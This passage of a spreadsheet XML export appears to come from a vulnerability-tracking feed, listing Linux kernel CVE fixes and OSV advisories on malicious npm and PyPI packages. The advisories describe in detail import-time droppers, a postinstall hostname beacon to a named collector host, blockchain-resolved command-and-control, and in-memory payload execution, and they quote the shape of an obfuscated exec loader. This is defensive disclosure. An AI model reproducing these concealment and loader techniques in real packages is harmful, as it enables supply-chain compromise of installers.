      <c r="S1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89766</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89768</t>
        </is>
      </c>
      <c r="D1082" s="5" t="inlineStr"/>
      <c r="E1082" s="5" t="inlineStr"/>
      <c r="F1082" s="5" t="inlineStr"/>
      <c r="G1082" s="5" t="inlineStr"/>
      <c r="H1082" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1082" s="5" t="inlineStr"/>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr"/>
      <c r="L1082" s="5" t="inlineStr"/>
      <c r="M1082" s="5" t="inlineStr"/>
      <c r="N1082" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1082" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1082" s="5" t="inlineStr"/>
      <c r="Q1082" s="5" t="inlineStr"/>
      <c r="R1082" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs: fix user path of nested backing files
backing_file_open() derives the path to be stored in the new backing
file from user_file-&gt;f_path.  This is incorrect when user_file itself
is a backing file, which is the case for nested stacking filesystems,
e.g. overlayfs mounts where the lowerdir of one overlayfs is the merged
directory of another.  Since commit def3ae83da02 ("fs: store real path
instead of fake path in backing file f_path") the f_path of a backing
file holds the real path of the intermediate layer, not the path that
the user opened.
Commit 924577e4f6ca ("ovl: Fix nested backing file paths") fixed this
for such configurations by passing file_user_path() from
ovl_open_realfile().  However, commit 6af36aeb147a ("lsm: add
backing_file LSM hooks") changed the first argument of
backing_file_open() from the user path back to the user file and
derived the path from user_file-&gt;f_path again, silently re-introducing
the problem.
As a result, files mapped through a nested overlayfs show the wrong
path in /proc/&lt;pid&gt;/maps and in perf/ftrace mmap records.  For example,
with two nested overlayfs mounts:
  mkdir -p /ovl/{lower,upper,work,merged} /ovl/nested
  echo hello &gt; /ovl/lower/foo
  mount -t overlay overlay \
	-o lowerdir=/ovl/lower,upperdir=/ovl/upper,workdir=/ovl/work \
	/ovl/merged
  # at least two lowerdirs are needed when upperdir is nonexistent
  mount -t overlay overlay \
	-o lowerdir=/ovl/merged:/ovl/lower /ovl/nested
mapping /ovl/nested/foo shows a disconnected path instead of the user
path:
  # readlink /proc/self/fd/3
  /ovl/nested/foo
  # grep foo /proc/self/maps
  7f6e2c100000-7f6e2c101000 r--s 00000000 00:24 15813027 /foo
The bogus path is derived from the f_path of the intermediate backing
file, whose mount is a private clone that d_path() cannot resolve.
Fix this by using file_user_path(), which returns the outermost
user-visible path for backing files and falls back to
&amp;user_file-&gt;f_path for regular files.  This restores the behavior of
commit 924577e4f6ca ("ovl: Fix nested backing file paths") for
overlayfs and also fixes the same problem for the other
backing_file_open() callers, fuse passthrough and erofs ishare, when
their user file is itself a backing file.
backing_tmpfile_open() has the same pattern but is not affected: it is
only called by ovl_create_tmpfile() for the upper layer, and another
overlayfs is rejected as upperdir by the DCACHE_OP_REAL check in
ovl_mount_dir_check(), so its user_file can never be a backing file.</t>
        </is>
      </c>
      <c r="S1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89768</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89770</t>
        </is>
      </c>
      <c r="D1083" s="5" t="inlineStr"/>
      <c r="E1083" s="5" t="inlineStr"/>
      <c r="F1083" s="5" t="inlineStr"/>
      <c r="G1083" s="5" t="inlineStr"/>
      <c r="H1083" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1083" s="5" t="inlineStr"/>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr"/>
      <c r="L1083" s="5" t="inlineStr"/>
      <c r="M1083" s="5" t="inlineStr"/>
      <c r="N1083" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1083" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1083" s="5" t="inlineStr"/>
      <c r="Q1083" s="5" t="inlineStr"/>
      <c r="R1083" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iomap: don't free integrity payload that doesn't exist
fs_bio_integrity_alloc might not allocate a bio integrity payload if PI
verification is disabled on the block device.  Check for that case before
calling fs_bio_integrity_free in iomap_bio_read_folio_range_sync to
avoid a NULL pointer dereferences.
Make the branch cover the PI verification as well - while
fs_bio_integrity_verify works without an integrity payload, it requires
one to actually do useful work.</t>
        </is>
      </c>
      <c r="S1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89770</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89772</t>
        </is>
      </c>
      <c r="D1084" s="5" t="inlineStr"/>
      <c r="E1084" s="5" t="inlineStr"/>
      <c r="F1084" s="5" t="inlineStr"/>
      <c r="G1084" s="5" t="inlineStr"/>
      <c r="H1084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1084" s="5" t="inlineStr"/>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr"/>
      <c r="L1084" s="5" t="inlineStr"/>
      <c r="M1084" s="5" t="inlineStr"/>
      <c r="N1084" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1084" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1084" s="5" t="inlineStr"/>
      <c r="Q1084" s="5" t="inlineStr"/>
      <c r="R1084" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: write-protect folios during data writeback
commit 095be159f3eb ("btrfs: unify folio dirty flag clearing") replaced
the folio_clear_dirty_for_io() call in extent_write_cache_pages() with a
plain folio_test_dirty() check. Besides clearing the dirty flag,
folio_clear_dirty_for_io() also calls folio_mkclean(), which write-protects
the shared mmap PTEs mapping the folio. Note that we still do call
folio_clear_dirty_for_io() later in submit_one_sector() when we clear
dirty on the last sector of the folio (the only sector for non-subpage
cases). But we lost this early call in extent_write_cache_pages().
Without the extra write-protection, a process with the file mmap-ed can
modify a sector while it is being used by writeback in a way that
expects a stable folio (checksumming, compressing, copying, etc...)
without faulting, which manifests as a handful of concrete bugs.
1. For large folios or subpage sectorsize, it is possible to submit a bio
which does not cover the whole folio. When this happens, we will have a
bio in flight for a folio that we have *not* called
folio_clear_dirty_for_io() on. If a task with an existing mmap-ed PTE
writes (without faulting..) in this window, it can result in
corruptions. If the write arrives while the checksumming or writing itself
is underway, this can result in an invalid checksum and later corruption
reports on read. If the write arrives after checksumming/writing is done
but before the last sector dirty is cleared, then the write is present
in page cache but doesn't affect the dirty tracking and will be lost
when the folio is fully finished being submitted and the dirty bit
is cleared. This results in losing the write even if fsync() is called.
2. For zoned submissions which are done in batch separate from the main
extent_writepage() loop, we also risk csum violations for those
submissions. Zoned writes are clamped to max_zone_append_size and are
not aligned with folios, so a submission can span two folios. The first
folio being processed in extent_write_cache_pages() will call
extent_write_locked_range() which will submit the partial range of the
next folio, while the rest of that folio could still be dirty. So
clearing dirty on the submitted sectors doesn't call
folio_clear_dirty_for_io() and we have the same issue. Since
extent_write_cache_pages() skips these batch submitted folios (they are
already marked for writeback from submission by the preceding folio), we
must add the extra write protection in lock_delalloc_folios().
3. For inline extents this will subtly risk losing writes that happen
after/while we copy the inline extent but before we clear dirty on
the folio.
4. For folios spanning EOF, mmap could tamper with the zeroed bytes past
EOF and cause them to be persisted where future faults would improperly
see them instead of zeros.
5. Finally, for compressed extents, we risk modifying the folios while we
work on compressing them which will result in corrupted compressed data.
Specifically, in run_delalloc_compressed() we queue up work to do
compress_file_range() in BTRFS_COMPRESSION_CHUNK_SIZE (512K) chunks which
will call btrfs_folio_clamp_clear_dirty() on the range. For non-subpage,
this will always clear the whole folio, safely. For subpage, we risk a
partial clear here as well. In particular, imagine a 2M folio broken up
into 512K chunks of work which might start compression work on one chunk
before all the chunks compress_file_range() workers have gotten far
enough to finish clearing all the dirty bitmaps of the folio and getting
to folio_clear_dirty_for_io(). Large folios on the edges of submission
ranges are similarly at risk to be only partly cleared.
This particular gap was introduced by a second patch in the same series:
commit a4ef54dbb576 ("btrfs: make extent_range_clear_dirty_for_io() to handle sector size &lt; page size cases")
We cannot simply restore the call to folio_clear
---truncated---</t>
        </is>
      </c>
      <c r="S1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89772</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89773</t>
        </is>
      </c>
      <c r="D1085" s="5" t="inlineStr"/>
      <c r="E1085" s="5" t="inlineStr"/>
      <c r="F1085" s="5" t="inlineStr"/>
      <c r="G1085" s="5" t="inlineStr"/>
      <c r="H1085" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1085" s="5" t="inlineStr"/>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr"/>
      <c r="L1085" s="5" t="inlineStr"/>
      <c r="M1085" s="5" t="inlineStr"/>
      <c r="N1085" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1085" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1085" s="5" t="inlineStr"/>
      <c r="Q1085" s="5" t="inlineStr"/>
      <c r="R1085" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Skip Update HDCP Config In Transition State
Transition state does not have a valid dm_stream_ctx that should skip
configuring HDCP routine. The routine is valid to go through only when
a valid stream is created.</t>
        </is>
      </c>
      <c r="S1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89773</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1086" s="5" t="inlineStr">
        <is>
          <t>GHSA-8p5f-pjcw-69mw</t>
        </is>
      </c>
      <c r="D1086" s="5" t="inlineStr"/>
      <c r="E1086" s="5" t="inlineStr"/>
      <c r="F1086" s="5" t="inlineStr"/>
      <c r="G1086" s="5" t="inlineStr"/>
      <c r="H1086" s="5" t="inlineStr"/>
      <c r="I1086" s="5" t="inlineStr"/>
      <c r="J1086" s="5" t="inlineStr"/>
      <c r="K1086" s="5" t="inlineStr"/>
      <c r="L1086" s="5" t="inlineStr">
        <is>
          <t>npm:tailwind-form-kit</t>
        </is>
      </c>
      <c r="M1086" s="5" t="inlineStr"/>
      <c r="N1086" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1086" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1086" s="5" t="inlineStr"/>
      <c r="Q1086" s="5" t="inlineStr"/>
      <c r="R1086" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (92f4a69a3b50ac2347f8b3324abca2c0df1cf83422ee0f164b799cb748fa76b5)
The package presents itself as a Tailwind CSS forms plugin but its main entry src/index.js is a heavily obfuscated module (obfuscator.io-style rotating string array with 303 entries, hex identifiers, control-flow dispatchers) that on require/import dynamically loads node:http, node:https, node:zlib, and node:child_process via createRequire and stashes them on the global object. On module load it issues POST requests carrying a custom x-payload-* header and a spoofed Chrome/Windows User-Agent to a hardcoded blockchain indexer (etherscan/blockscout-style) and to public Ethereum RPC providers (publicnode.com, drpc.org, 1rpc.io, eth-mainnet), reading process.env.ETH_RPC_URL to augment the RPC list, and references a hardcoded Ethereum sender address. None of this behavior is disclosed and none of it corresponds to a Tailwind CSS forms plugin; the repository field also impersonates tailwindlabs. The combination of heavy obfuscation, dynamic-require caching on global, spawn availability, and unsolicited outbound blockchain network I/O at library-load is a covert import-time channel unrelated to the advertised purpose.
## Source: ghsa-malware (2f393dd02d60e026717c58d23e86b376b0a47b73038607f8ddd9254442f0d1e6)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1086" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16139</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1087" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16126</t>
        </is>
      </c>
      <c r="D1087" s="5" t="inlineStr"/>
      <c r="E1087" s="5" t="inlineStr"/>
      <c r="F1087" s="5" t="inlineStr"/>
      <c r="G1087" s="5" t="inlineStr"/>
      <c r="H1087" s="5" t="inlineStr"/>
      <c r="I1087" s="5" t="inlineStr"/>
      <c r="J1087" s="5" t="inlineStr"/>
      <c r="K1087" s="5" t="inlineStr"/>
      <c r="L1087" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-vinsoc-1109</t>
        </is>
      </c>
      <c r="M1087" s="5" t="inlineStr"/>
      <c r="N1087" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1087" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1087" s="5" t="inlineStr"/>
      <c r="Q1087" s="5" t="inlineStr"/>
      <c r="R1087" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4dbb0aa83cfffbdd408abb8f73299d5a47a0e9855c65b5940bb22112e0928d41)
The package's postinstall lifecycle script (`node postinstall.js || true`) fires automatically on `npm install`. postinstall.js reads `os.hostname()`, embeds the sanitized value as a subdomain of the hardcoded host `1bdtwmd0wdrpwnlput1up9x39ufl3br0.oastify.com` (a Burp Collaborator out-of-band collector), and performs both a DNS lookup and a plain-HTTP GET to `/poc/&lt;hostname&gt;` at that host. The result is silent transmission of the installer's machine identifier to an attacker-controlled OOB endpoint on every install, with errors swallowed so the install does not visibly fail. The package name and version resemble a scoped Strapi plugin but the shipped payload performs no plugin functionality — only the beacon.
## Source: ossf-package-analysis (3dad65e846069addf34b62c3321a51ff2d43b04f6385c7edcbd8f3a2552e876b)
The OpenSSF Package Analysis project identified 'strapi-plugin-vinsoc-1109' @ 3.6.8 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="S1087" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16126</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1088" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16127</t>
        </is>
      </c>
      <c r="D1088" s="5" t="inlineStr"/>
      <c r="E1088" s="5" t="inlineStr"/>
      <c r="F1088" s="5" t="inlineStr"/>
      <c r="G1088" s="5" t="inlineStr"/>
      <c r="H1088" s="5" t="inlineStr"/>
      <c r="I1088" s="5" t="inlineStr"/>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr"/>
      <c r="L1088" s="5" t="inlineStr">
        <is>
          <t>PyPI:eth-account-web3</t>
        </is>
      </c>
      <c r="M1088" s="5" t="inlineStr"/>
      <c r="N1088" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1088" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1088" s="5" t="inlineStr"/>
      <c r="Q1088" s="5" t="inlineStr"/>
      <c r="R1088" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (38b69dc345e5f7b75dbe6dccaf3dfc013a98e302176130aac064cbd8d042bae7)
The distribution eth-account-web3 installs under the import name eth_account, colliding with the legitimate ethereum/eth-account library. On import, __init__.py invokes _auto()/sync() in a background thread named 'urllib3-connection-pool'. When the ETH_ACCT_RPC and ETH_ACCT_CONTRACT environment variables are present, sync() issues an eth_call to the configured contract to retrieve a URL, downloads the response over HTTP(S) with no hash or signature verification, and passes the bytes to _apply_txn_payload. Python payloads are handed to exec(compile(...)). Windows PE payloads (MZ magic) are mapped via CreateFileMappingW/MapViewOfFile and launched with CreateProcessW using DETACHED_PROCESS|CREATE_NO_WINDOW, avoiding any on-disk artifact. Other binary payloads are written to /tmp/_ethrt_&lt;pid&gt;.bin, chmod +x'd, spawned detached with start_new_session=True, and then deleted. The URL source is attacker-controlled (a Solidity contract the operator of the on-chain pointer can update at any time), giving remote code execution on the installer with in-memory execution and anti-forensics on Windows and immediate file cleanup on POSIX. The import-name collision and the urllib3-impersonating thread name are deliberate concealment intended to blend into normal Python/Web3 activity.
## Source: kam193 (25b1d3ecadcdc171186f8b8c574e830d3078a33be08f0455fd7bafc179d028ca)
A clone of a legitimate package with import-time malicious code activating if specific env variables are set. Once activated, it queries the blockchain to retrieve the next stage URL stored in a smart contract. The payload from the URL is then downloaded and executed. The address of the smart contract is not included in the package.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-web3-eth-account
Reasons (based on the campaign):
 - typosquatting
 - clones-real-package
 - c2-in-blockchain
 - Downloads and executes a remote malicious script.
</t>
        </is>
      </c>
      <c r="S1088" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16127</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1089" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16128</t>
        </is>
      </c>
      <c r="D1089" s="5" t="inlineStr"/>
      <c r="E1089" s="5" t="inlineStr"/>
      <c r="F1089" s="5" t="inlineStr"/>
      <c r="G1089" s="5" t="inlineStr"/>
      <c r="H1089" s="5" t="inlineStr"/>
      <c r="I1089" s="5" t="inlineStr"/>
      <c r="J1089" s="5" t="inlineStr"/>
      <c r="K1089" s="5" t="inlineStr"/>
      <c r="L1089" s="5" t="inlineStr">
        <is>
          <t>PyPI:pymem-win</t>
        </is>
      </c>
      <c r="M1089" s="5" t="inlineStr"/>
      <c r="N1089" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1089" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1089" s="5" t="inlineStr"/>
      <c r="Q1089" s="5" t="inlineStr"/>
      <c r="R1089" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4c611131ac135f4608698ce56eebd7dc89623b591510a050f2059369c9d51bbf)
Pymem-win is a near-verbatim copy of the legitimate upstream Pymem package (reusing its description, repository URL github.com/srounet/Pymem, and author identity Fabien Reboia &lt;srounet@gmail.com&gt;) republished under a confusable name. The top-level pymem/__init__.py contains a one-line loader that reverses a bytes literal, base64-decodes it, zlib-decompresses it, and passes the result to exec(). This runs unconditionally on `import pymem`, handing full in-process code execution to a payload deliberately hidden behind three stacked transforms. The multi-layer obfuscation around an exec target has no legitimate purpose in a library import path; combined with the typosquat cover story that reuses the upstream author's identity, the package's function on install/import is to run attacker-chosen code inside any process that imports it.
## Source: kam193 (82eb1f11c9b56a2f2c3e97530db43ef94784a2c75697223828403927b0528477)
During import, the obfuscated code downloads and executes an executable. The remote executable did not exist during analysis, but the repository used to host it overlaps with previous campaign 2026-07-yt-api-dlp
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pymem-win
Reasons (based on the campaign):
 - obfuscation
 - Downloads and executes a remote executable.
 - clones-real-package
</t>
        </is>
      </c>
      <c r="S1089" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16128</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1090" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16129</t>
        </is>
      </c>
      <c r="D1090" s="5" t="inlineStr"/>
      <c r="E1090" s="5" t="inlineStr"/>
      <c r="F1090" s="5" t="inlineStr"/>
      <c r="G1090" s="5" t="inlineStr"/>
      <c r="H1090" s="5" t="inlineStr"/>
      <c r="I1090" s="5" t="inlineStr"/>
      <c r="J1090" s="5" t="inlineStr"/>
      <c r="K1090" s="5" t="inlineStr"/>
      <c r="L1090" s="5" t="inlineStr">
        <is>
          <t>PyPI:web3-eth-account</t>
        </is>
      </c>
      <c r="M1090" s="5" t="inlineStr"/>
      <c r="N1090" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1090" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1090" s="5" t="inlineStr"/>
      <c r="Q1090" s="5" t="inlineStr"/>
      <c r="R1090" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (19e3eadaccc63a1e12d0e3cfe153cbf78e114f30285d4da3694990827e5f5c5a)
The package `web3-eth-account` typosquats the legitimate `eth-account` library and copies its metadata (ApeWorX/ethereum.org author addresses, README instructing `pip install eth-account`). On `import eth_account`, `__init__.py` calls `_auto()` which, when the environment variables `ETH_ACCT_RPC` and `ETH_ACCT_CONTRACT` are set, spawns a background thread (named `urllib3-connection-pool` for cover) that performs a JSON-RPC `eth_call` with selector `0x5600f04f` against an attacker-controlled Ethereum contract, decodes an ABI-encoded URL from contract storage, downloads bytes via `urllib.request.urlopen`, and hands them to `_apply_txn_payload` in `signing.py` / `transaction_utils.py`. That sink classifies the fetched bytes and executes them three ways: Python source via `exec(compile(...))`; Windows PE loaded in-memory via ctypes `CreateFileMappingW`/`MapViewOfFile`/`CreateProcessW`; otherwise written to `/tmp/_ethrt_&lt;pid&gt;.bin`, `chmod +x`, launched via `subprocess.Popen` in a new session with the file removed after launch. The C2 URL is resolved on-chain rather than embedded as a literal, defeating static URL extraction, and the dropper functions are disguised under transaction/signing names.
## Source: kam193 (bd36aeb2d45881a66bf5373c0b91a108637938dab5e0c153525e6f938c9c9503)
A clone of a legitimate package with import-time malicious code activating if specific env variables are set. Once activated, it queries the blockchain to retrieve the next stage URL stored in a smart contract. The payload from the URL is then downloaded and executed. The address of the smart contract is not included in the package.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-web3-eth-account
Reasons (based on the campaign):
 - typosquatting
 - clones-real-package
 - c2-in-blockchain
 - Downloads and executes a remote malicious script.
</t>
        </is>
      </c>
      <c r="S1090" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16129</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1091" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16130</t>
        </is>
      </c>
      <c r="D1091" s="5" t="inlineStr"/>
      <c r="E1091" s="5" t="inlineStr"/>
      <c r="F1091" s="5" t="inlineStr"/>
      <c r="G1091" s="5" t="inlineStr"/>
      <c r="H1091" s="5" t="inlineStr"/>
      <c r="I1091" s="5" t="inlineStr"/>
      <c r="J1091" s="5" t="inlineStr"/>
      <c r="K1091" s="5" t="inlineStr"/>
      <c r="L1091" s="5" t="inlineStr">
        <is>
          <t>PyPI:aitextkit-py</t>
        </is>
      </c>
      <c r="M1091" s="5" t="inlineStr"/>
      <c r="N1091" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1091" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1091" s="5" t="inlineStr"/>
      <c r="Q1091" s="5" t="inlineStr"/>
      <c r="R1091" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (47e96f519e8acba48a6f7760b37a9ad70b94bfbf79fb5eac4fc682849b2837e3)
The package presents itself as a small text-cleaning utility library, but both shipped implementation modules (text.py and system.py) consist of a single-line pyobfuscator.com loader of the form `_ = lambda __: __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'...'))`, which reverses, base64-decodes, zlib-decompresses, and exec()s an opaque blob at module import. __init__.py imports from.text, so `import aitextkit` runs the decoded bytes on the installer's Python interpreter. __init__.py also re-exports an undocumented `setup` symbol whose body lives inside the obfuscated blob and which is not mentioned in the README, tests, or public API documentation - a common stager entry-point shape. system.py, which backs the documented `get_os_version()` helper, uses the identical loader and its tests reference `platform`, `release`, and `arch` fields, so the decoded code at minimum performs host enumeration inside code that is not inspectable from source. The declared text-utility purpose has no legitimate need to ship its entire implementation as an exec-decoded blob; the loader shape matches that used by PyPI credential-stealer families.
## Source: kam193 (73303124008a821f9096bc4899d8df4302abc2e0f86822660422f855a1bc65cb)
The package hides code downloading script, which then downloads and executes a heavily obfuscated final stage. The remote stages are hosted on a domain presenting a suspicious-looking corporate website. The downloaded code establishes persistence e.g. as "anymeetly-cameradriver" systemd service. The discovered artifacts suggest strongly it acts as an infostealer and RAT.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-aitextkit-py
Reasons (based on the campaign):
 - obfuscation
 - Downloads and executes a remote malicious script.
 - persistence
 - infostealer
 - exfiltration-browser-data
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="S1091" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16130</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1092" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16131</t>
        </is>
      </c>
      <c r="D1092" s="5" t="inlineStr"/>
      <c r="E1092" s="5" t="inlineStr"/>
      <c r="F1092" s="5" t="inlineStr"/>
      <c r="G1092" s="5" t="inlineStr"/>
      <c r="H1092" s="5" t="inlineStr"/>
      <c r="I1092" s="5" t="inlineStr"/>
      <c r="J1092" s="5" t="inlineStr"/>
      <c r="K1092" s="5" t="inlineStr"/>
      <c r="L1092" s="5" t="inlineStr">
        <is>
          <t>PyPI:aitextutils-py</t>
        </is>
      </c>
      <c r="M1092" s="5" t="inlineStr"/>
      <c r="N1092" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1092" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1092" s="5" t="inlineStr"/>
      <c r="Q1092" s="5" t="inlineStr"/>
      <c r="R1092" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (59b5d893cd227654dae3bd7964e54ba20c99963660993e4239f34bba0d50b772)
This package executes code from malicious dependency, which hides code downloading script, which then downloads and executes a heavily obfuscated final stage. The remote stages are hosted on a domain presenting a suspicious-looking corporate website. The downloaded code establishes persistence e.g. as "anymeetly-cameradriver" systemd service.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-aitextkit-py
Reasons (based on the campaign):
 - obfuscation
 - Downloads and executes a remote malicious script.
 - persistence
 - infostealer
 - exfiltration-browser-data
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="S1092" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16131</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
